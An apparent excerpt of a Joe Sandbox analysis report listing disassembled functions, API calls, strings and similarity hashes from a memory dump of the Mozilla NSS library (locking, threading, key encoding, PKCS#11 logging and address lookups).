Part of subcall function 6C6CBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6D21BC), ref: 6C6CBB8C

PR_NewLock.NSS3 ref: 6C7F9CA9

Part of subcall function 6C7A98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C7A9946
Part of subcall function 6C7A98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6616B7,00000000), ref: 6C7A994E
Part of subcall function 6C7A98D0: free.MOZGLUE(00000000), ref: 6C7A995E

PR_NewLock.NSS3 ref: 6C7F9CB9
PR_NewLock.NSS3 ref: 6C7F9CC9
PR_NewCondVar.NSS3(00000000), ref: 6C7F9CDA

Part of subcall function 6C6CBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6CBBEB
Part of subcall function 6C6CBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C6CBBFB
Part of subcall function 6C6CBB80: GetLastError.KERNEL32 ref: 6C6CBC03
Part of subcall function 6C6CBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C6CBC19
Part of subcall function 6C6CBB80: free.MOZGLUE(00000000), ref: 6C6CBC22

PR_NewCondVar.NSS3(?), ref: 6C7F9CF0
PR_NewPollableEvent.NSS3 ref: 6C7F9D03

Part of subcall function 6C7EF3B0: PR_CallOnce.NSS3(6C8414B0,6C7EF510), ref: 6C7EF3E6
Part of subcall function 6C7EF3B0: PR_CreateIOLayerStub.NSS3(6C84006C), ref: 6C7EF402
Part of subcall function 6C7EF3B0: PR_Malloc.NSS3(00000004), ref: 6C7EF416
Part of subcall function 6C7EF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C7EF42D
Part of subcall function 6C7EF3B0: PR_SetSocketOption.NSS3(?), ref: 6C7EF455
Part of subcall function 6C7EF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C7EF473

Part of subcall function 6C7A9890: TlsGetValue.KERNEL32(?,?,?,6C7A97EB), ref: 6C7A989E

EnterCriticalSection.KERNEL32(?), ref: 6C7F9D78
calloc.MOZGLUE(00000001,0000000C), ref: 6C7F9DAF
_PR_CreateThread.NSS3(00000000,6C7F9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C7F9D9F

Part of subcall function 6C6CB3C0: TlsGetValue.KERNEL32 ref: 6C6CB403
Part of subcall function 6C6CB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C6CB459

_PR_CreateThread.NSS3(00000000,6C7FA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C7F9DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6C7F9DFC
_PR_CreateThread.NSS3(00000000,6C7FA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C7F9E29
calloc.MOZGLUE(00000001,0000000C), ref: 6C7F9E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6C7F9E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C7F9E89

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 2a529674103ac52042a53d15ce4cf3b6f7e792f6e32ba8f331a65e917c3ce3f7
Instruction ID: 201d6d611bcd4cf9068944b4348fee6632c9fb7706df269a7f982bddce89e63b
Opcode Fuzzy Hash: 2a529674103ac52042a53d15ce4cf3b6f7e792f6e32ba8f331a65e917c3ce3f7
Instruction Fuzzy Hash: 786180B1A00706AFD714DF75D988A67BBF8FF18208B04453AE829C7B11E730E815CBA5

Function 6C6F3FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

SECKEY_CopyPublicKey.NSS3(?), ref: 6C6F4014

Part of subcall function 6C6F39F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C6F5E6F,?), ref: 6C6F3A08
Part of subcall function 6C6F39F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C6F5E6F), ref: 6C6F3A1C
Part of subcall function 6C6F39F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6F3A3C

PORT_NewArena_Util.NSS3(00000800), ref: 6C6F4038

Part of subcall function 6C740FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
Part of subcall function 6C740FF0: PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016
Part of subcall function 6C740FF0: PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C6F404D

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C80A0F4), ref: 6C6F40C2

Part of subcall function 6C73F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C73F0C8
Part of subcall function 6C73F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C73F122

SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6C6F409A

Part of subcall function 6C73BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C6EE708,00000000,00000000,00000004,00000000), ref: 6C73BE6A
Part of subcall function 6C73BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6F04DC,?), ref: 6C73BE7E
Part of subcall function 6C73BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C73BEC2

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F40DE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6F40F4
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6F4108
SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6C6F411A
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6C6F4137
SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6C6F4150
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6C80A1C8), ref: 6C6F417E
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6C6F4194
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C6F41A7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6F41B2
PK11_DestroyObject.NSS3(?,?), ref: 6C6F41D9
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6F41FC
SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C80A1A8), ref: 6C6F422D

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
String ID:
API String ID: 912348568-0
Opcode ID: 0d594b18e25d49558fbd6e1c4e9712bfa4cb1cc737ec684ff445c7f853f88979
Instruction ID: f030a931abb9fa07f597091904e5939c23b9347dcb91f1a1a32d9cd9955cbae1
Opcode Fuzzy Hash: 0d594b18e25d49558fbd6e1c4e9712bfa4cb1cc737ec684ff445c7f853f88979
Instruction Fuzzy Hash: 275139B1B003006BF7109B299F49BB776DEDF5034CF044928E969C6F92FB71E4098265

Function 6C738E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C738E01,00000000,6C739060,6C840B64), ref: 6C738E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C738E01,00000000,6C739060,6C840B64), ref: 6C738E9E
PORT_ArenaAlloc_Util.NSS3(6C840B64,00000001,?,?,?,?,6C738E01,00000000,6C739060,6C840B64), ref: 6C738EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C738E01,00000000,6C739060,6C840B64), ref: 6C738EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C738E01,00000000,6C739060,6C840B64), ref: 6C738ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C738E01,00000000,6C739060,6C840B64), ref: 6C738EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C738E01), ref: 6C738EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C840B64,6C840B64), ref: 6C738F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C738F3F

Part of subcall function 6C73A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C73A421,00000000,00000000,6C739826), ref: 6C73A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C73904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C738E76

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: b105b0af981f8fffb848d31bd0f85a9ca5dbb6c1f4f88da91fe972849d97f6e5
Instruction ID: e877b23d5d2f6f8c3867d3e3be63bdb279a45f4be32633cfd30b148414ccb536
Opcode Fuzzy Hash: b105b0af981f8fffb848d31bd0f85a9ca5dbb6c1f4f88da91fe972849d97f6e5
Instruction Fuzzy Hash: 7961C4B5D0012AABDB10CF55CE84AABB7B5FF94358F144129DC1CA7701EB35A915CBB0

Function 6C6E8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6E8E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C6E8E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6E8EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C8118D0,?), ref: 6C6E8F03
PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C6E8F19
PL_FreeArenaPool.NSS3(?), ref: 6C6E8F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C6E8F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6E8F65
PL_FinishArenaPool.NSS3(?), ref: 6C6E8FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C6E8FFE
PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C6E9012
PL_FreeArenaPool.NSS3(?), ref: 6C6E9024
PL_FinishArenaPool.NSS3(?), ref: 6C6E902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C6E903E

Strings

security, xrefs: 6C6E8EE7

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 07155ae291052deb18a2296de68f967e7786174d5bc2bc7974aba91264c071d3
Instruction ID: 09b72c8ed11636aa82c88ea74e4f8948898c7755475fa2b41011aeb4a0c42663
Opcode Fuzzy Hash: 07155ae291052deb18a2296de68f967e7786174d5bc2bc7974aba91264c071d3
Instruction Fuzzy Hash: 565146B160D300ABD6209A589D48BAB33A8AB8D75CF44482FF95497B50E331D909C757

Function 6C714E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C714E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C714EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C714EC7

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C714EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C714F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C714F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C714F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C714F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C714F68

Strings

hObject = 0x%x, xrefs: 6C714EF5, 6C714F05
pTemplate = 0x%p, xrefs: 6C714F4A
(CK_INVALID_HANDLE), xrefs: 6C714EC0, 6C714F13
ulCount = %d, xrefs: 6C714F63
C_GetAttributeValue, xrefs: 6C714E7E
hSession = 0x%x, xrefs: 6C714EA2, 6C714EB2

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: 0b6bdfe6e23e6d82e4219b3a8f23ad59da95eae587c735c81c152aa2e4b59a97
Instruction ID: 5b68b6649150a632a8b9f7afcc3632993cdae231e44c89af2ef80314849ab36d
Opcode Fuzzy Hash: 0b6bdfe6e23e6d82e4219b3a8f23ad59da95eae587c735c81c152aa2e4b59a97
Instruction Fuzzy Hash: D941C435609104ABDB10EF54DE8CF9A7BB9EB4230DF0C8434E918A7B11D734AD09DB96

Function 6C714CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C714CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C714D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C714D37

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C714D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C714D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C714D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C714DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C714DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C714E20

Strings

hObject = 0x%x, xrefs: 6C714D65, 6C714D75
C_GetObjectSize, xrefs: 6C714CEE
(CK_INVALID_HANDLE), xrefs: 6C714D30, 6C714D83
hSession = 0x%x, xrefs: 6C714D12, 6C714D22
pulSize = 0x%p, xrefs: 6C714DB7
*pulSize = 0x%x, xrefs: 6C714E1B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: d0d1bb70d6020658f2308d5641668946c47c31952f044e3bc8620289e57e6d7c
Instruction ID: 0d64c05cd90f1b7c19053bfac3c34927456ba3d78729b8589c24d4f336557bae
Opcode Fuzzy Hash: d0d1bb70d6020658f2308d5641668946c47c31952f044e3bc8620289e57e6d7c
Instruction Fuzzy Hash: 5B41C571609104AFDB20AF50DF8DB6A3BB5EB5230DF088434E9189BB11D7349C49EB92

Function 6C717C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6C717CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C717CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C717CF3

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C717D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C717D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C717D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C717D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C717D77

Strings

pSignature = 0x%p, xrefs: 6C717D59
(CK_INVALID_HANDLE), xrefs: 6C717CEC
pData = 0x%p, xrefs: 6C717D25
hSession = 0x%x, xrefs: 6C717CCE, 6C717CDE
C_Verify, xrefs: 6C717CB1
ulDataLen = %d, xrefs: 6C717D40
ulSignatureLen = %d, xrefs: 6C717D72

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
API String ID: 1003633598-3278097884
Opcode ID: 57db25c82f8ae2c093120c4b539fc07ef7a7e99924d0902e39c949d0b2741360
Instruction ID: b67560749c7a649bdc6e467f65cdf87ce4ace98f62773c2ee89e4fb837112530
Opcode Fuzzy Hash: 57db25c82f8ae2c093120c4b539fc07ef7a7e99924d0902e39c949d0b2741360
Instruction Fuzzy Hash: 2531B031605148EFDB20EF64DF8DF6A3BB1AB4221DF088474E85897B11DB349849CBE2

Function 6C712F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C712F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C712F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C712F63

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C712F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C712F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C712FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C712FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C712FE7

Strings

pNewPin = 0x%p, xrefs: 6C712FC9
pOldPin = 0x%p, xrefs: 6C712F95
C_SetPIN, xrefs: 6C712F21
ulOldLen = %d, xrefs: 6C712FB0
(CK_INVALID_HANDLE), xrefs: 6C712F5C
ulNewLen = %d, xrefs: 6C712FE2
hSession = 0x%x, xrefs: 6C712F3E, 6C712F4E

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
API String ID: 1003633598-3716813897
Opcode ID: bcc33f2020b10f31f3e15bbcf1bd8fbbacf1200d292adf97aba964229f76a4f5
Instruction ID: 35a0b48c252141029438aa27f44320802c47155371baae03979ae3d5c8b8a9b3
Opcode Fuzzy Hash: bcc33f2020b10f31f3e15bbcf1bd8fbbacf1200d292adf97aba964229f76a4f5
Instruction Fuzzy Hash: 5631B075609144AFDB20EF54DE8CE5A3BB5EB4731DF098434E808A7B11DB349849DB92

Function 6C7ACD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C7ACC7B), ref: 6C7ACD7A

Part of subcall function 6C7ACE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C71C1A8,?), ref: 6C7ACE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7ACDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7ACDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C7ACDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7ACD8E

Part of subcall function 6C6D05C0: PR_EnterMonitor.NSS3 ref: 6C6D05D1
Part of subcall function 6C6D05C0: PR_ExitMonitor.NSS3 ref: 6C6D05EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C7ACDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7ACDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7ACE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7ACE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C7ACE48

Strings

freeaddrinfo, xrefs: 6C7ACD9F, 6C7ACE10
ws2_32.dll, xrefs: 6C7ACD75
getnameinfo, xrefs: 6C7ACDB2, 6C7ACE23
getaddrinfo, xrefs: 6C7ACD88, 6C7ACDF9
wship6.dll, xrefs: 6C7ACDE3

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 46d27dc3cfcd4cde3b57366e4f0b2f95bf1747f5d9f69db681236aab9cd90524
Instruction ID: 03c47754fb8de09fcb59e4beaaef141df6006533d7399e33473e7ea9b729fc61
Opcode Fuzzy Hash: 46d27dc3cfcd4cde3b57366e4f0b2f95bf1747f5d9f69db681236aab9cd90524
